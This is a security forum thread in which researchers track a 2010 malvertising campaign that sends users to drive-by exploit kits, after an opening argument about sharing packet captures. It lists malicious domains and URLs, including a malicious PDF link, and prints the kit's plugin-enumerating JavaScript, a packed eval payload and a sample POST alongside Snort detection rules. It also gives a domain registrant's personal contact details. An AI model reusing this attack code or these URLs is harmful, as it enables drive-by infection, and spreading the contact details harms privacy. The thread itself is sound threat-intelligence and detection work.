adnet.media.*.com domains - NEW TITLE

[cleanmx]

For over the last 4-5 years I've spend most of my time if not all on reporting malware.

And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.

hi Kimberly, hi eoin,

please slow down a bit .... both sidess....  publishing pcaps in public is bad... but i guess kimberly made a mistake...


-- gerhard

[eoin.miller]

FYI, this is still running pretty rampant

Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.

YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.

Yea, it is not the lack of proper vetting within the business process of adding new advertising affiliates. Well, that and a complete lack of major advertising organizations following their own redirects to their affiliates constantly to observe if they are serving up malware and drive bys.

It isn't like we aren't sharing a common goal, but apparently by producing to the community what is going on without risking the data of my clients, or my own job, makes you somehow blame me for the malvertising campaigns I take the time to research and disclose. All the while you continiously refuse to provide any channels or contacts that you claim to know exist to report this information to directly. The both of you completely lack the understanding of what is required to disclose traffic from my client to any other organization.

Thats as nice as I am going to put it. Stay out of the thread unless you have actual pertinent information regarding domains to be added to the list. If you have some more personally oriented snipes to try and send, take it to PM. That is why it is there.

[Kimberly]

publishing pcaps in public is bad... but i guess kimberly made a mistake...

I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.

[eoin.miller]

publishing pcaps in public is bad... but i guess kimberly made a mistake...

I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.

Affiliate ID's and domains don't matter to my client, data being POST'd back to servers after exploitation does. I post the affiliate ID's and domains so that they will become known and public so people can block them as we do. I will not be disclosing full PCAPs of my client to you so stop bringing it up.

Is this seriously the type of conduct that is deemed accecptable on this board?

[MysteryFCM]

Can we all calm down and put this issue to rest please. I won't allow this behaviour to continue.

We're all on the same side here and meant too be helping each other take the bad guys down. If someone doesn't wish to share contacts or data then fine, that is up to them (and as far as pcaps, most corps don't allow those to be shared publicly, or indeed privately, for obvious security reasons, stripped out or otherwise), just contact me and I'll help find the appropriate contact for you.

[moranned]

thanks to Steve for mediating this. agreed that we are all on the same team here.

[eoin.miller]

More drive bys:

hgptd.com

http://hgptd.com/g/index.php


Redirected from:
zherlova1388.newmail.ru/ypypumu.html
puaho.notlong.com
graudin4.nm.ru/ixywesuw.html
dolieb.notlong.com

[eoin.miller]

More redirects to the baddie domains:

http://ir.pe/2c3o

**EDIT**

Apparently this ir.pe is just some sort of URL redirection service in spanish.

[eoin.miller]

More still ongoing:

Ad servers:
view.atdmt.com.daxitymb.com
media.fastclick.net.tribudd.com
view.atdmt.com.cidersi.com
ad.doubleclick.net.wifell.com
adnet.media.intati.com

Seeing most of the ad services over in the 95.143.193.0/24 net now. Still redirecting clients to the known bad networks full of drive bys.

Those above malvertising domains will toss you to a stats/check in site:

Check in for stats tracking:
http://generalline.co.cc/rss.php?n=cust11

Eventutally redirects you over to the actual drive by (we are supposing here as we block the destination nets on our networks):

Drive bys examples:
http://uprtx.com/rbds/mh_t.php

[moranned]

if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com   
Bumzc.com   
Potyur.com   
Palcaug.com   
Uoptyr.com   
Uprtx.com

[eoin.miller]

Been working on a Snort sig to track the big malvertising campaigns responsible for most of our favorite FakeAV installs. The servers return a common form of JavaScript ompression commonly used by jquery and also used by Google and others. Luckily, the servers from google and others are not normally ngix and the ones that are ngix are serving up the javascript with the correct Content-Type instead of text/html. So based on that we created this sig and have had a pretty low FP rate for the
last day or so that has helped us identify the malvertising servers and add them to the egress filters.

Code: [Select]

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING eval(function(p,a,c,k,e,d) JavaScript from ngix Detected"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"Content-Type\: text/html"; nocase; distance:20; content:"eval(function(p,a,c,k,e,d)"; nocase; distance:50; classtype:bad-unknown; sid:5600046; rev:1;)
Sample packet payload:

Code: [Select]

00000245  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000255  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 30 .Server:  nginx/0
00000265  2e 37 2e 36 35 0d 0a 44  61 74 65 3a 20 4d 6f 6e .7.65..D ate: Mon
00000275  2c 20 32 31 20 4a 75 6e  20 32 30 31 30 20 31 33 , 21 Jun  2010 13
00000285  3a 32 39 3a 34 35 20 47  4d 54 0d 0a 43 6f 6e 74 :29:45 G MT..Cont
00000295  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
000002A5  74 6d 6c 0d 0a 54 72 61  6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
000002B5  63 6f 64 69 6e 67 3a 20  63 68 75 6e 6b 65 64 0d coding:  chunked.
000002C5  0a 43 6f 6e 6e 65 63 74  69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
000002D5  70 2d 61 6c 69 76 65 0d  0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000002E5  65 64 2d 42 79 3a 20 50  48 50 2f 35 2e 32 2e 31 ed-By: P HP/5.2.1
000002F5  33 0d 0a 0d 0a 66 37 32  0d 0a 65 76 61 6c 28 66 3....f72 ..eval(f
00000305  75 6e 63 74 69 6f 6e 28  70 2c 61 2c 63 2c 6b 2c unction( p,a,c,k,
00000315  65 2c 64 29 7b 65 3d 66  75 6e 63 74 69 6f 6e 28 e,d){e=f unction(
00000325  63 29 7b 72 65 74 75 72  6e 28 63 3c 61 3f 27 27 c){retur n(c<a?''
00000335  3a 65 28 70 61 72 73 65  49 6e 74 28 63 2f 61 29 :e(parse Int(c/a)
00000345  29 29 2b 28 28 63 3d 63  25 61 29 3e 33 35 3f 53 ))+((c=c %a)>35?S
00000355  74 72 69 6e 67 2e 66 72  6f 6d 43 68 61 72 43 6f tring.fr omCharCo
00000365  64 65 28 63 2b 32 39 29  3a 63 2e 74 6f 53 74 72 de(c+29) :c.toStr
00000375  69 6e 67 28 33 36 29 29  7d 3b 69 66 28 21 27 27 ing(36)) };if(!''
00000385  2e 72 65 70 6c 61 63 65  28 2f 5e 2f 2c 53 74 72 .replace (/^/,Str
00000395  69 6e 67 29 29 7b 77 68  69 6c 65 28 63 2d 2d 29 ing)){wh ile(c--)
000003A5  7b 64 5b 65 28 63 29 5d  3d 6b 5b 63 5d 7c 7c 65 {d[e(c)] =k[c]||e
000003B5  28 63 29 7d 6b 3d 5b 66  75 6e 63 74 69 6f 6e 28 (c)}k=[f unction(
000003C5  65 29 7b 72 65 74 75 72  6e 20 64 5b 65 5d 7d 5d e){retur n d[e]}]

Submitted it over to the guys over at ET (EmergingThreats) so it may be in future releases if it is deemed worthy.

[eoin.miller]

if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com   
Bumzc.com   
Potyur.com   
Palcaug.com   
Uoptyr.com   
Uprtx.com

Definately, the all resolve to be within the 194.8.250.0/24 netblock. The drive by domains will flip around inside that netblock every couple of weeks or so.

Some of the other check-in sites for stats are:
jahsgdqtuz.co.cc
generalline.co.cc


New malvertising sites:
view.atdmt.com.landsm.com
media.rseeting.com


New payload/malware sites:
http://nwsplt.com/pqmmh/_dwfxw.php

***EDIT***

Looks like if the URL has already been visited, it redirects the client to Google.com based upon if the client IP has already made the request before.

[moranned]

Eoin, thanks for keeping us all up to date on this and putting together a snort sig to detect these campaigns.

the earlier campaign hosts what appears to be SEO Sploit packs on 194.8.250.60.

this most recent outbreak is also hosting what appear to be SEO Sploit packs on 194.8.250.15.

All the exploit domains in both campaigns are registered to:

Pat Casey
patcasey@xhotmail.com
+1.7149214718
fax: +1.7149214718
1201 E. Candlewood
Orange CA 92867
us

Ive observed a cocktail of Bamital, TDSS, and Rogue AV dropped during these campaigns.

[eoin.miller]

Just trying to give as much as I get from everyone else who contributes!  

Check-in:
webclickst.co.cc

Drive-by:
fjoty.com

Malicious PDF:
http://fjoty.com/pw/hxnrgy/ghyv.pdf

Keep seeing the URL's rotate, might be time based?
http://fjoty.com/jz/cvra.php
http://fjoty.com/pw/za_pumsvx.php


When you load the page the first time, you get this back:

Code: [Select]

<html>
<body>
<script>
document.write('<form action="za_pumsvx.php" method="post"><input type="hidden" name="id" value="" />');
var id="adbac98ea8cc4816ae7652f9ade94ac6&n";
if(navigator.javaEnabled())
{
id="adbac98ea8cc4816ae7652f9ade94ac6&j";
}
for(var i=0;i<navigator.plugins.length;i++)
{
if(navigator.plugins[i].description.indexOf("Adobe Acrobat")!=-1)
{
id=id+"p";
break;
}
if(navigator.plugins[i].description.indexOf("Adobe PDF")!=-1)
{
id=id+"p";
break;
}
}
var f=document.forms[0];
f.id.value=id;
f.submit();
</script>
</body>
</html>

It enumerates the browser plugins and POST's back that info to the server which picks the exploit to serve up. So you would have a POST like this coming back from the client after executing the above JavaScript:

Code: [Select]

POST /pw/za_pumsvx.php HTTP/1.1
Host: fjoty.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fjoty.com/pw/za_pumsvx.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

id=adbac98ea8cc4816ae7652f9ade94ac6%26np
I am going to try and get some more traffic from this and see how easy it may be to sig the POST from the client. The id= sticks out pretty easy, I just dont think it is consistant becuase the server appears to go off of the length of the random string to determine which exploits to serve up. Should be able to sig it with a little regex though.

***EDIT***

Here is a rough Snort sig with minimal testing for clients POST'ing to the SEO Exploit kits to get themselves some malicious Java or PDF's:

Code: [Select]

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING POST to SEO Exploit Kit"; flow:established,to_server; content:"POST "; depth:5; nocase; content:".php HTTP"; nocase; distance:0; pcre:"/id=[a-f0-9]{32}(&|%26)(np|jp|n|j)/iR"; classtype:bad-unknown; sid:5600047; rev:2;)
This should help track people who have been exploited by the PDF from the drive by:

Code: [Select]

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING Adobe Exploited Check-In"; flow:established,to_server; content:"GET "; nocase; depth:4; uricontent:".php?&&reader_version="; nocase; classtype:trojan-activity; sid:5600048; rev:1;)
Sig developted from the following wepawet report:
http://wepawet.iseclab.org/view.php?hash=a47d8bc28e859963220c777818a938a1&type=js

[eoin.miller]

Exploit domain of the day:

fruuf.com